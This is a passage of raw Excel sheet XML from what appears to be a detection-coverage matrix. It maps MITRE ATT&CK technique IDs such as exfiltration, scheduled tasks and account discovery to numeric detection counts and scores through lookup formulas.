      </c>
      <c r="AB16" s="392">
        <v>7</v>
      </c>
      <c r="AC16" s="16">
        <v>1</v>
      </c>
      <c r="AD16" s="394">
        <v>878</v>
      </c>
      <c r="AE16" s="392">
        <v>2287</v>
      </c>
      <c r="AF16" s="392">
        <v>2204</v>
      </c>
      <c r="AG16" s="322">
        <v>0</v>
      </c>
      <c r="AH16" s="392">
        <v>13</v>
      </c>
      <c r="AI16" s="16">
        <v>1</v>
      </c>
      <c r="AJ16" s="394">
        <v>878</v>
      </c>
      <c r="AK16" s="392">
        <v>3246</v>
      </c>
      <c r="AL16" s="392">
        <v>3108</v>
      </c>
      <c r="AM16" s="322">
        <v>0</v>
      </c>
      <c r="AN16" s="392">
        <v>20</v>
      </c>
      <c r="AO16" s="16">
        <v>1</v>
      </c>
      <c r="AP16" s="394">
        <v>878</v>
      </c>
      <c r="AQ16" s="292">
        <v>0</v>
      </c>
      <c r="AR16" s="322">
        <v>0</v>
      </c>
      <c r="AS16" s="322">
        <v>0</v>
      </c>
      <c r="AT16" s="12">
        <v>0</v>
      </c>
      <c r="AU16" s="13">
        <v>0</v>
      </c>
      <c r="AV16" s="394">
        <v>0</v>
      </c>
      <c r="AW16" s="392">
        <v>34</v>
      </c>
      <c r="AX16" s="392">
        <v>20</v>
      </c>
      <c r="AY16" s="322">
        <v>0</v>
      </c>
      <c r="AZ16" s="4">
        <v>1</v>
      </c>
      <c r="BA16" s="16">
        <v>1</v>
      </c>
      <c r="BB16" s="394">
        <v>20</v>
      </c>
      <c r="BC16" s="292">
        <v>1416</v>
      </c>
      <c r="BD16" s="322">
        <v>1347</v>
      </c>
      <c r="BE16" s="322">
        <v>0</v>
      </c>
      <c r="BF16" s="12">
        <v>10</v>
      </c>
      <c r="BG16" s="13">
        <v>1</v>
      </c>
      <c r="BH16" s="394">
        <v>878</v>
      </c>
      <c r="BI16" s="292">
        <v>2</v>
      </c>
      <c r="BJ16" s="322">
        <v>2</v>
      </c>
      <c r="BK16" s="322">
        <v>0</v>
      </c>
      <c r="BL16" s="12">
        <v>1</v>
      </c>
      <c r="BM16" s="13">
        <v>1</v>
      </c>
      <c r="BN16" s="394">
        <v>2</v>
      </c>
      <c r="BO16" s="292">
        <v>1825</v>
      </c>
      <c r="BP16" s="322">
        <v>1822</v>
      </c>
      <c r="BQ16" s="322">
        <v>0</v>
      </c>
      <c r="BR16" s="12">
        <v>1</v>
      </c>
      <c r="BS16" s="12">
        <v>5</v>
      </c>
      <c r="BT16" s="13">
        <v>1</v>
      </c>
      <c r="BU16" s="394">
        <v>913</v>
      </c>
      <c r="BV16" s="292">
        <v>0</v>
      </c>
      <c r="BW16" s="322">
        <v>0</v>
      </c>
      <c r="BX16" s="322">
        <v>0</v>
      </c>
      <c r="BY16" s="12">
        <v>0</v>
      </c>
      <c r="BZ16" s="13">
        <v>0</v>
      </c>
      <c r="CA16" s="394">
        <v>0</v>
      </c>
      <c r="CB16" s="292">
        <v>0</v>
      </c>
      <c r="CC16" s="322">
        <v>0</v>
      </c>
      <c r="CD16" s="322">
        <v>0</v>
      </c>
      <c r="CE16" s="12">
        <v>0</v>
      </c>
      <c r="CF16" s="12">
        <v>0</v>
      </c>
      <c r="CG16" s="13">
        <v>0</v>
      </c>
      <c r="CH16" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A17" s="4">
        <f t="shared" si="0"/>
        <v>15</v>
      </c>
      <c r="B17" s="4" t="str">
        <f>IFERROR(VLOOKUP(A17,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1048</v>
      </c>
      <c r="C17" s="493" t="str">
        <f>IFERROR(VLOOKUP(B17,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="D17" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B17)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E17" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F17" s="579" t="str">
        <f t="shared" si="1"/>
        <v>2 (12)</v>
      </c>
      <c r="G17" s="292">
        <v>2</v>
      </c>
      <c r="H17" s="322">
        <v>1</v>
      </c>
      <c r="I17" s="322">
        <v>0</v>
      </c>
      <c r="J17" s="12">
        <v>1</v>
      </c>
      <c r="K17" s="13">
        <v>0.5</v>
      </c>
      <c r="L17" s="394">
        <v>1</v>
      </c>
      <c r="M17" s="322">
        <v>0</v>
      </c>
      <c r="N17" s="322">
        <v>0</v>
      </c>
      <c r="O17" s="322">
        <v>0</v>
      </c>
      <c r="P17" s="12">
        <v>0</v>
      </c>
      <c r="Q17" s="13">
        <v>0</v>
      </c>
      <c r="R17" s="394">
        <v>0</v>
      </c>
      <c r="S17" s="292">
        <v>2</v>
      </c>
      <c r="T17" s="322">
        <v>1</v>
      </c>
      <c r="U17" s="322">
        <v>0</v>
      </c>
      <c r="V17" s="12">
        <v>1</v>
      </c>
      <c r="W17" s="13">
        <v>0.5</v>
      </c>
      <c r="X17" s="394">
        <v>1</v>
      </c>
      <c r="Y17" s="392">
        <v>66</v>
      </c>
      <c r="Z17" s="392">
        <v>5</v>
      </c>
      <c r="AA17" s="322">
        <v>0</v>
      </c>
      <c r="AB17" s="392">
        <v>5</v>
      </c>
      <c r="AC17" s="16">
        <v>1</v>
      </c>
      <c r="AD17" s="394">
        <v>2</v>
      </c>
      <c r="AE17" s="392">
        <v>51</v>
      </c>
      <c r="AF17" s="392">
        <v>12</v>
      </c>
      <c r="AG17" s="322">
        <v>0</v>
      </c>
      <c r="AH17" s="392">
        <v>8</v>
      </c>
      <c r="AI17" s="16">
        <v>1</v>
      </c>
      <c r="AJ17" s="394">
        <v>3</v>
      </c>
      <c r="AK17" s="392">
        <v>117</v>
      </c>
      <c r="AL17" s="392">
        <v>17</v>
      </c>
      <c r="AM17" s="322">
        <v>0</v>
      </c>
      <c r="AN17" s="392">
        <v>13</v>
      </c>
      <c r="AO17" s="16">
        <v>1</v>
      </c>
      <c r="AP17" s="394">
        <v>3</v>
      </c>
      <c r="AQ17" s="292">
        <v>0</v>
      </c>
      <c r="AR17" s="322">
        <v>0</v>
      </c>
      <c r="AS17" s="322">
        <v>0</v>
      </c>
      <c r="AT17" s="12">
        <v>0</v>
      </c>
      <c r="AU17" s="13">
        <v>0</v>
      </c>
      <c r="AV17" s="394">
        <v>0</v>
      </c>
      <c r="AW17" s="392">
        <v>48</v>
      </c>
      <c r="AX17" s="392">
        <v>3</v>
      </c>
      <c r="AY17" s="322">
        <v>0</v>
      </c>
      <c r="AZ17" s="4">
        <v>3</v>
      </c>
      <c r="BA17" s="16">
        <v>0.5</v>
      </c>
      <c r="BB17" s="394">
        <v>1</v>
      </c>
      <c r="BC17" s="292">
        <v>50</v>
      </c>
      <c r="BD17" s="322">
        <v>4</v>
      </c>
      <c r="BE17" s="322">
        <v>0</v>
      </c>
      <c r="BF17" s="12">
        <v>4</v>
      </c>
      <c r="BG17" s="13">
        <v>1</v>
      </c>
      <c r="BH17" s="394">
        <v>2</v>
      </c>
      <c r="BI17" s="292">
        <v>0</v>
      </c>
      <c r="BJ17" s="322">
        <v>0</v>
      </c>
      <c r="BK17" s="322">
        <v>0</v>
      </c>
      <c r="BL17" s="12">
        <v>0</v>
      </c>
      <c r="BM17" s="13">
        <v>0</v>
      </c>
      <c r="BN17" s="394">
        <v>0</v>
      </c>
      <c r="BO17" s="292">
        <v>9</v>
      </c>
      <c r="BP17" s="322">
        <v>3</v>
      </c>
      <c r="BQ17" s="322">
        <v>0</v>
      </c>
      <c r="BR17" s="12">
        <v>0</v>
      </c>
      <c r="BS17" s="12">
        <v>3</v>
      </c>
      <c r="BT17" s="13">
        <v>1</v>
      </c>
      <c r="BU17" s="394">
        <v>3</v>
      </c>
      <c r="BV17" s="292">
        <v>0</v>
      </c>
      <c r="BW17" s="322">
        <v>0</v>
      </c>
      <c r="BX17" s="322">
        <v>0</v>
      </c>
      <c r="BY17" s="12">
        <v>0</v>
      </c>
      <c r="BZ17" s="13">
        <v>0</v>
      </c>
      <c r="CA17" s="394">
        <v>0</v>
      </c>
      <c r="CB17" s="292">
        <v>0</v>
      </c>
      <c r="CC17" s="322">
        <v>0</v>
      </c>
      <c r="CD17" s="322">
        <v>0</v>
      </c>
      <c r="CE17" s="12">
        <v>0</v>
      </c>
      <c r="CF17" s="12">
        <v>0</v>
      </c>
      <c r="CG17" s="13">
        <v>0</v>
      </c>
      <c r="CH17" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A18" s="4">
        <f t="shared" si="0"/>
        <v>16</v>
      </c>
      <c r="B18" s="4" t="str">
        <f>IFERROR(VLOOKUP(A18,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1053</v>
      </c>
      <c r="C18" s="493" t="str">
        <f>IFERROR(VLOOKUP(B18,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Task/Job</v>
      </c>
      <c r="D18" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B18)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E18" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F18" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (2)</v>
      </c>
      <c r="G18" s="292">
        <v>1</v>
      </c>
      <c r="H18" s="322">
        <v>1</v>
      </c>
      <c r="I18" s="322">
        <v>0</v>
      </c>
      <c r="J18" s="12">
        <v>1</v>
      </c>
      <c r="K18" s="13">
        <v>1</v>
      </c>
      <c r="L18" s="394">
        <v>1</v>
      </c>
      <c r="M18" s="322">
        <v>14</v>
      </c>
      <c r="N18" s="322">
        <v>4</v>
      </c>
      <c r="O18" s="322">
        <v>0</v>
      </c>
      <c r="P18" s="12">
        <v>4</v>
      </c>
      <c r="Q18" s="13">
        <v>1</v>
      </c>
      <c r="R18" s="394">
        <v>2</v>
      </c>
      <c r="S18" s="292">
        <v>15</v>
      </c>
      <c r="T18" s="322">
        <v>5</v>
      </c>
      <c r="U18" s="322">
        <v>0</v>
      </c>
      <c r="V18" s="12">
        <v>5</v>
      </c>
      <c r="W18" s="13">
        <v>1</v>
      </c>
      <c r="X18" s="394">
        <v>2</v>
      </c>
      <c r="Y18" s="392">
        <v>25</v>
      </c>
      <c r="Z18" s="392">
        <v>8</v>
      </c>
      <c r="AA18" s="322">
        <v>0</v>
      </c>
      <c r="AB18" s="392">
        <v>7</v>
      </c>
      <c r="AC18" s="16">
        <v>1</v>
      </c>
      <c r="AD18" s="394">
        <v>2</v>
      </c>
      <c r="AE18" s="392">
        <v>52</v>
      </c>
      <c r="AF18" s="392">
        <v>15</v>
      </c>
      <c r="AG18" s="322">
        <v>0</v>
      </c>
      <c r="AH18" s="392">
        <v>12</v>
      </c>
      <c r="AI18" s="16">
        <v>1</v>
      </c>
      <c r="AJ18" s="394">
        <v>2</v>
      </c>
      <c r="AK18" s="392">
        <v>77</v>
      </c>
      <c r="AL18" s="392">
        <v>23</v>
      </c>
      <c r="AM18" s="322">
        <v>0</v>
      </c>
      <c r="AN18" s="392">
        <v>19</v>
      </c>
      <c r="AO18" s="16">
        <v>1</v>
      </c>
      <c r="AP18" s="394">
        <v>2</v>
      </c>
      <c r="AQ18" s="292">
        <v>0</v>
      </c>
      <c r="AR18" s="322">
        <v>0</v>
      </c>
      <c r="AS18" s="322">
        <v>0</v>
      </c>
      <c r="AT18" s="12">
        <v>0</v>
      </c>
      <c r="AU18" s="13">
        <v>0</v>
      </c>
      <c r="AV18" s="394">
        <v>0</v>
      </c>
      <c r="AW18" s="392">
        <v>5</v>
      </c>
      <c r="AX18" s="392">
        <v>3</v>
      </c>
      <c r="AY18" s="322">
        <v>0</v>
      </c>
      <c r="AZ18" s="4">
        <v>3</v>
      </c>
      <c r="BA18" s="16">
        <v>1</v>
      </c>
      <c r="BB18" s="394">
        <v>1</v>
      </c>
      <c r="BC18" s="292">
        <v>20</v>
      </c>
      <c r="BD18" s="322">
        <v>8</v>
      </c>
      <c r="BE18" s="322">
        <v>0</v>
      </c>
      <c r="BF18" s="12">
        <v>8</v>
      </c>
      <c r="BG18" s="13">
        <v>1</v>
      </c>
      <c r="BH18" s="394">
        <v>2</v>
      </c>
      <c r="BI18" s="292">
        <v>4</v>
      </c>
      <c r="BJ18" s="322">
        <v>3</v>
      </c>
      <c r="BK18" s="322">
        <v>0</v>
      </c>
      <c r="BL18" s="12">
        <v>2</v>
      </c>
      <c r="BM18" s="13">
        <v>1</v>
      </c>
      <c r="BN18" s="394">
        <v>3</v>
      </c>
      <c r="BO18" s="292">
        <v>6</v>
      </c>
      <c r="BP18" s="322">
        <v>5</v>
      </c>
      <c r="BQ18" s="322">
        <v>0</v>
      </c>
      <c r="BR18" s="12">
        <v>2</v>
      </c>
      <c r="BS18" s="12">
        <v>1</v>
      </c>
      <c r="BT18" s="13">
        <v>1</v>
      </c>
      <c r="BU18" s="394">
        <v>3</v>
      </c>
      <c r="BV18" s="292">
        <v>1</v>
      </c>
      <c r="BW18" s="322">
        <v>1</v>
      </c>
      <c r="BX18" s="322">
        <v>0</v>
      </c>
      <c r="BY18" s="12">
        <v>1</v>
      </c>
      <c r="BZ18" s="13">
        <v>1</v>
      </c>
      <c r="CA18" s="394">
        <v>1</v>
      </c>
      <c r="CB18" s="292">
        <v>13</v>
      </c>
      <c r="CC18" s="322">
        <v>2</v>
      </c>
      <c r="CD18" s="322">
        <v>0</v>
      </c>
      <c r="CE18" s="12">
        <v>1</v>
      </c>
      <c r="CF18" s="12">
        <v>1</v>
      </c>
      <c r="CG18" s="13">
        <v>1</v>
      </c>
      <c r="CH18" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:86" ht="15" customHeight="1">
      <c r="A19" s="4">
        <f t="shared" si="0"/>
        <v>17</v>
      </c>
      <c r="B19" s="4" t="str">
        <f>IFERROR(VLOOKUP(A19,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1070</v>
      </c>
      <c r="C19" s="493" t="str">
        <f>IFERROR(VLOOKUP(B19,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Indicator Removal</v>
      </c>
      <c r="D19" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B19)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E19" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F19" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="G19" s="292">
        <v>0</v>
      </c>
      <c r="H19" s="322">
        <v>0</v>
      </c>
      <c r="I19" s="322">
        <v>0</v>
      </c>
      <c r="J19" s="12">
        <v>0</v>
      </c>
      <c r="K19" s="13">
        <v>0</v>
      </c>
      <c r="L19" s="394">
        <v>0</v>
      </c>
      <c r="M19" s="322">
        <v>0</v>
      </c>
      <c r="N19" s="322">
        <v>0</v>
      </c>
      <c r="O19" s="322">
        <v>0</v>
      </c>
      <c r="P19" s="12">
        <v>0</v>
      </c>
      <c r="Q19" s="13">
        <v>0</v>
      </c>
      <c r="R19" s="394">
        <v>0</v>
      </c>
      <c r="S19" s="292">
        <v>0</v>
      </c>
      <c r="T19" s="322">
        <v>0</v>
      </c>
      <c r="U19" s="322">
        <v>0</v>
      </c>
      <c r="V19" s="12">
        <v>0</v>
      </c>
      <c r="W19" s="13">
        <v>0</v>
      </c>
      <c r="X19" s="394">
        <v>0</v>
      </c>
      <c r="Y19" s="392">
        <v>0</v>
      </c>
      <c r="Z19" s="392">
        <v>0</v>
      </c>
      <c r="AA19" s="322">
        <v>0</v>
      </c>
      <c r="AB19" s="392">
        <v>0</v>
      </c>
      <c r="AC19" s="16">
        <v>0</v>
      </c>
      <c r="AD19" s="394">
        <v>0</v>
      </c>
      <c r="AE19" s="392">
        <v>11</v>
      </c>
      <c r="AF19" s="392">
        <v>11</v>
      </c>
      <c r="AG19" s="322">
        <v>0</v>
      </c>
      <c r="AH19" s="392">
        <v>11</v>
      </c>
      <c r="AI19" s="16">
        <v>1</v>
      </c>
      <c r="AJ19" s="394">
        <v>1</v>
      </c>
      <c r="AK19" s="392">
        <v>11</v>
      </c>
      <c r="AL19" s="392">
        <v>11</v>
      </c>
      <c r="AM19" s="322">
        <v>0</v>
      </c>
      <c r="AN19" s="392">
        <v>11</v>
      </c>
      <c r="AO19" s="16">
        <v>1</v>
      </c>
      <c r="AP19" s="394">
        <v>1</v>
      </c>
      <c r="AQ19" s="292">
        <v>0</v>
      </c>
      <c r="AR19" s="322">
        <v>0</v>
      </c>
      <c r="AS19" s="322">
        <v>0</v>
      </c>
      <c r="AT19" s="12">
        <v>0</v>
      </c>
      <c r="AU19" s="13">
        <v>0</v>
      </c>
      <c r="AV19" s="394">
        <v>0</v>
      </c>
      <c r="AW19" s="392">
        <v>0</v>
      </c>
      <c r="AX19" s="392">
        <v>0</v>
      </c>
      <c r="AY19" s="322">
        <v>0</v>
      </c>
      <c r="AZ19" s="4">
        <v>0</v>
      </c>
      <c r="BA19" s="16">
        <v>0</v>
      </c>
      <c r="BB19" s="394">
        <v>0</v>
      </c>
      <c r="BC19" s="292">
        <v>0</v>
      </c>
      <c r="BD19" s="322">
        <v>0</v>
      </c>
      <c r="BE19" s="322">
        <v>0</v>
      </c>
      <c r="BF19" s="12">
        <v>0</v>
      </c>
      <c r="BG19" s="13">
        <v>0</v>
      </c>
      <c r="BH19" s="394">
        <v>0</v>
      </c>
      <c r="BI19" s="292">
        <v>0</v>
      </c>
      <c r="BJ19" s="322">
        <v>0</v>
      </c>
      <c r="BK19" s="322">
        <v>0</v>
      </c>
      <c r="BL19" s="12">
        <v>0</v>
      </c>
      <c r="BM19" s="13">
        <v>0</v>
      </c>
      <c r="BN19" s="394">
        <v>0</v>
      </c>
      <c r="BO19" s="292">
        <v>5</v>
      </c>
      <c r="BP19" s="322">
        <v>4</v>
      </c>
      <c r="BQ19" s="322">
        <v>0</v>
      </c>
      <c r="BR19" s="12">
        <v>0</v>
      </c>
      <c r="BS19" s="12">
        <v>4</v>
      </c>
      <c r="BT19" s="13">
        <v>1</v>
      </c>
      <c r="BU19" s="394">
        <v>1</v>
      </c>
      <c r="BV19" s="292">
        <v>0</v>
      </c>
      <c r="BW19" s="322">
        <v>0</v>
      </c>
      <c r="BX19" s="322">
        <v>0</v>
      </c>
      <c r="BY19" s="12">
        <v>0</v>
      </c>
      <c r="BZ19" s="13">
        <v>0</v>
      </c>
      <c r="CA19" s="394">
        <v>0</v>
      </c>
      <c r="CB19" s="292">
        <v>1</v>
      </c>
      <c r="CC19" s="322">
        <v>1</v>
      </c>
      <c r="CD19" s="322">
        <v>0</v>
      </c>
      <c r="CE19" s="12">
        <v>0</v>
      </c>
      <c r="CF19" s="12">
        <v>1</v>
      </c>
      <c r="CG19" s="13">
        <v>1</v>
      </c>
      <c r="CH19" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:86" ht="15" customHeight="1">
      <c r="A20" s="4">
        <f t="shared" si="0"/>
        <v>18</v>
      </c>
      <c r="B20" s="4" t="str">
        <f>IFERROR(VLOOKUP(A20,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1071</v>
      </c>
      <c r="C20" s="493" t="str">
        <f>IFERROR(VLOOKUP(B20,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Application Layer Protocol</v>
      </c>
      <c r="D20" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B20)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E20" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>198</v>
      </c>
      <c r="F20" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (198)</v>
      </c>
      <c r="G20" s="292">
        <v>204</v>
      </c>
      <c r="H20" s="322">
        <v>10</v>
      </c>
      <c r="I20" s="322">
        <v>0</v>
      </c>
      <c r="J20" s="12">
        <v>1</v>
      </c>
      <c r="K20" s="13">
        <v>1</v>
      </c>
      <c r="L20" s="394">
        <v>10</v>
      </c>
      <c r="M20" s="322">
        <v>0</v>
      </c>
      <c r="N20" s="322">
        <v>0</v>
      </c>
      <c r="O20" s="322">
        <v>0</v>
      </c>
      <c r="P20" s="12">
        <v>0</v>
      </c>
      <c r="Q20" s="13">
        <v>0</v>
      </c>
      <c r="R20" s="394">
        <v>0</v>
      </c>
      <c r="S20" s="292">
        <v>204</v>
      </c>
      <c r="T20" s="322">
        <v>10</v>
      </c>
      <c r="U20" s="322">
        <v>0</v>
      </c>
      <c r="V20" s="12">
        <v>1</v>
      </c>
      <c r="W20" s="13">
        <v>1</v>
      </c>
      <c r="X20" s="394">
        <v>10</v>
      </c>
      <c r="Y20" s="392">
        <v>205</v>
      </c>
      <c r="Z20" s="392">
        <v>11</v>
      </c>
      <c r="AA20" s="322">
        <v>0</v>
      </c>
      <c r="AB20" s="392">
        <v>2</v>
      </c>
      <c r="AC20" s="16">
        <v>1</v>
      </c>
      <c r="AD20" s="394">
        <v>11</v>
      </c>
      <c r="AE20" s="392">
        <v>106</v>
      </c>
      <c r="AF20" s="392">
        <v>105</v>
      </c>
      <c r="AG20" s="322">
        <v>0</v>
      </c>
      <c r="AH20" s="392">
        <v>5</v>
      </c>
      <c r="AI20" s="16">
        <v>1</v>
      </c>
      <c r="AJ20" s="394">
        <v>100</v>
      </c>
      <c r="AK20" s="392">
        <v>311</v>
      </c>
      <c r="AL20" s="392">
        <v>116</v>
      </c>
      <c r="AM20" s="322">
        <v>0</v>
      </c>
      <c r="AN20" s="392">
        <v>7</v>
      </c>
      <c r="AO20" s="16">
        <v>1</v>
      </c>
      <c r="AP20" s="394">
        <v>107</v>
      </c>
      <c r="AQ20" s="292">
        <v>0</v>
      </c>
      <c r="AR20" s="322">
        <v>0</v>
      </c>
      <c r="AS20" s="322">
        <v>0</v>
      </c>
      <c r="AT20" s="12">
        <v>0</v>
      </c>
      <c r="AU20" s="13">
        <v>0</v>
      </c>
      <c r="AV20" s="394">
        <v>0</v>
      </c>
      <c r="AW20" s="392">
        <v>0</v>
      </c>
      <c r="AX20" s="392">
        <v>0</v>
      </c>
      <c r="AY20" s="322">
        <v>0</v>
      </c>
      <c r="AZ20" s="4">
        <v>0</v>
      </c>
      <c r="BA20" s="16">
        <v>0</v>
      </c>
      <c r="BB20" s="394">
        <v>0</v>
      </c>
      <c r="BC20" s="292">
        <v>204</v>
      </c>
      <c r="BD20" s="322">
        <v>10</v>
      </c>
      <c r="BE20" s="322">
        <v>0</v>
      </c>
      <c r="BF20" s="12">
        <v>1</v>
      </c>
      <c r="BG20" s="13">
        <v>1</v>
      </c>
      <c r="BH20" s="394">
        <v>10</v>
      </c>
      <c r="BI20" s="292">
        <v>20</v>
      </c>
      <c r="BJ20" s="322">
        <v>10</v>
      </c>
      <c r="BK20" s="322">
        <v>0</v>
      </c>
      <c r="BL20" s="12">
        <v>1</v>
      </c>
      <c r="BM20" s="13">
        <v>1</v>
      </c>
      <c r="BN20" s="394">
        <v>10</v>
      </c>
      <c r="BO20" s="292">
        <v>218</v>
      </c>
      <c r="BP20" s="322">
        <v>208</v>
      </c>
      <c r="BQ20" s="322">
        <v>0</v>
      </c>
      <c r="BR20" s="12">
        <v>1</v>
      </c>
      <c r="BS20" s="12">
        <v>2</v>
      </c>
      <c r="BT20" s="13">
        <v>1</v>
      </c>
      <c r="BU20" s="394">
        <v>198</v>
      </c>
      <c r="BV20" s="292">
        <v>5</v>
      </c>
      <c r="BW20" s="322">
        <v>5</v>
      </c>
      <c r="BX20" s="322">
        <v>0</v>
      </c>
      <c r="BY20" s="12">
        <v>1</v>
      </c>
      <c r="BZ20" s="13">
        <v>1</v>
      </c>
      <c r="CA20" s="394">
        <v>5</v>
      </c>
      <c r="CB20" s="292">
        <v>10</v>
      </c>
      <c r="CC20" s="322">
        <v>10</v>
      </c>
      <c r="CD20" s="322">
        <v>0</v>
      </c>
      <c r="CE20" s="12">
        <v>1</v>
      </c>
      <c r="CF20" s="12">
        <v>1</v>
      </c>
      <c r="CG20" s="13">
        <v>1</v>
      </c>
      <c r="CH20" s="394">
        <v>5</v>
      </c>
    </row>
    <row r="21" spans="1:86" ht="15" customHeight="1">
      <c r="A21" s="4">
        <f t="shared" si="0"/>
        <v>19</v>
      </c>
      <c r="B21" s="4" t="str">
        <f>IFERROR(VLOOKUP(A21,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1087</v>
      </c>
      <c r="C21" s="493" t="str">
        <f>IFERROR(VLOOKUP(B21,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Account Discovery</v>
      </c>
      <c r="D21" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B21)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E21" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F21" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (2)</v>
      </c>
      <c r="G21" s="292">
        <v>24</v>
      </c>
      <c r="H21" s="322">
        <v>2</v>
      </c>
      <c r="I21" s="322">
        <v>0</v>
      </c>
      <c r="J21" s="12">
        <v>2</v>
      </c>
      <c r="K21" s="13">
        <v>1</v>
      </c>
      <c r="L21" s="394">
        <v>1</v>
      </c>
      <c r="M21" s="322">
        <v>11</v>
      </c>
      <c r="N21" s="322">
        <v>4</v>
      </c>
      <c r="O21" s="322">
        <v>0</v>
      </c>
      <c r="P21" s="12">
        <v>4</v>
      </c>
      <c r="Q21" s="13">
        <v>1</v>
      </c>
      <c r="R21" s="394">
        <v>2</v>
      </c>
      <c r="S21" s="292">
        <v>35</v>
      </c>
      <c r="T21" s="322">
        <v>6</v>
      </c>
      <c r="U21" s="322">
        <v>0</v>
      </c>
      <c r="V21" s="12">
        <v>6</v>
      </c>
      <c r="W21" s="13">
        <v>1</v>
      </c>
      <c r="X21" s="394">
        <v>2</v>
      </c>
      <c r="Y21" s="392">
        <v>42</v>
      </c>
      <c r="Z21" s="392">
        <v>10</v>
      </c>
      <c r="AA21" s="322">
        <v>0</v>
      </c>
      <c r="AB21" s="392">
        <v>9</v>
      </c>
      <c r="AC21" s="16">
        <v>1</v>
      </c>
      <c r="AD21" s="394">
        <v>2</v>
      </c>
      <c r="AE21" s="392">
        <v>36</v>
      </c>
      <c r="AF21" s="392">
        <v>13</v>
      </c>
      <c r="AG21" s="322">
        <v>0</v>
      </c>
      <c r="AH21" s="392">
        <v>13</v>
      </c>
      <c r="AI21" s="16">
        <v>1</v>
      </c>
      <c r="AJ21" s="394">
        <v>2</v>
      </c>
      <c r="AK21" s="392">
        <v>78</v>
      </c>
      <c r="AL21" s="392">
        <v>23</v>
      </c>
      <c r="AM21" s="322">
        <v>0</v>
      </c>
      <c r="AN21" s="392">
        <v>22</v>
      </c>
      <c r="AO21" s="16">
        <v>1</v>
      </c>
      <c r="AP21" s="394">
        <v>2</v>
      </c>
      <c r="AQ21" s="292">
        <v>0</v>
      </c>
      <c r="AR21" s="322">
        <v>0</v>
      </c>
      <c r="AS21" s="322">
        <v>0</v>
      </c>
      <c r="AT21" s="12">
        <v>0</v>
      </c>
      <c r="AU21" s="13">
        <v>0</v>
      </c>
      <c r="AV21" s="394">
        <v>0</v>
      </c>
      <c r="AW21" s="392">
        <v>4</v>
      </c>
      <c r="AX21" s="392">
        <v>3</v>
      </c>
      <c r="AY21" s="322">
        <v>0</v>
      </c>
      <c r="AZ21" s="4">
        <v>3</v>
      </c>
      <c r="BA21" s="16">
        <v>1</v>
      </c>
      <c r="BB21" s="394">
        <v>1</v>
      </c>
      <c r="BC21" s="292">
        <v>39</v>
      </c>
      <c r="BD21" s="322">
        <v>9</v>
      </c>
      <c r="BE21" s="322">
        <v>0</v>
      </c>
      <c r="BF21" s="12">
        <v>9</v>
      </c>
      <c r="BG21" s="13">
        <v>1</v>
      </c>
      <c r="BH21" s="394">
        <v>2</v>
      </c>
      <c r="BI21" s="292">
        <v>2</v>
      </c>
      <c r="BJ21" s="322">
        <v>2</v>
      </c>
      <c r="BK21" s="322">
        <v>0</v>
      </c>
      <c r="BL21" s="12">
        <v>1</v>
      </c>
      <c r="BM21" s="13">
